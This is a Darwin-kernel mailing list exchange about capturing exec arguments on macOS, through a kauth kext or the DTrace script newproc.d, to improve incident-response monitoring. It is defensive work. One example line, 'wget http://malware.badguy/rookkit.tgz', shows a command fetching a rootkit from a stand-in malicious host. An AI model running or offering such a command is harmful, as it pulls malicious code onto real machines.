Re: accessing argv on exec
Re: accessing argv on exec
- Subject: Re: accessing argv on exec
- From: Peter Moody <email@hidden>
- Date: Tue, 11 Nov 2014 13:46:26 -0800
On Tue, Nov 11 2014 at 13:11, Jay O'Conor wrote:
> Hi Peter,
>
> Is this something that DTrace could handle instead of a custom kext? I’m curious if you’ve looked at the newproc.d
> command (dtrace script)?
>
> Regards,
>
> — Jay
Hi Jay,
Maybe ..? It looks like newproc.d more or less has what I want, but it
looks like running it full time incurs a fairly heavy performance
penalty..
>> On Nov 10, 2014, at 3:02 PM, Peter Moody <email@hidden> wrote:
>>
>> Hey folks,
>>
>> apologies for what will likely be a noobish question, I'm just getting
>> acquainted with xnu and kexts and all that.
>>
>> I'm interested in monitoring process creation (and termination) on the
>> mac. It looks like I can use a kext that registers a listener for
>> kauth_fileop_exec to be notified of an exec, and the callback is:
>>
>> a) given a char* of the path the binary.
>> b) run in the context of the newly executing binary (so proc_self()
>> and the like work for getting pid/ppid, etc).
>>
>> but is there anyway that I can actually access the argv that was passed
>> to the execve call?
>>
>> I'm trying to do this to help our incident response capabilities, where
>> obviously just seeing that 'wget' was called is a lot less informative
>> than seeing 'wget http://malware.badguy/rookkit.tgz'
>>
>> Cheers,
>> peter
>> _______________________________________________
>> Do not post admin requests to the list. They will be ignored.
>> Darwin-kernel mailing list (email@hidden)
>> Help/Unsubscribe/Update your Subscription:
>>
>> This email sent to email@hidden
_______________________________________________
Do not post admin requests to the list. They will be ignored.
Darwin-kernel mailing list (email@hidden)
Help/Unsubscribe/Update your Subscription:
This email sent to email@hidden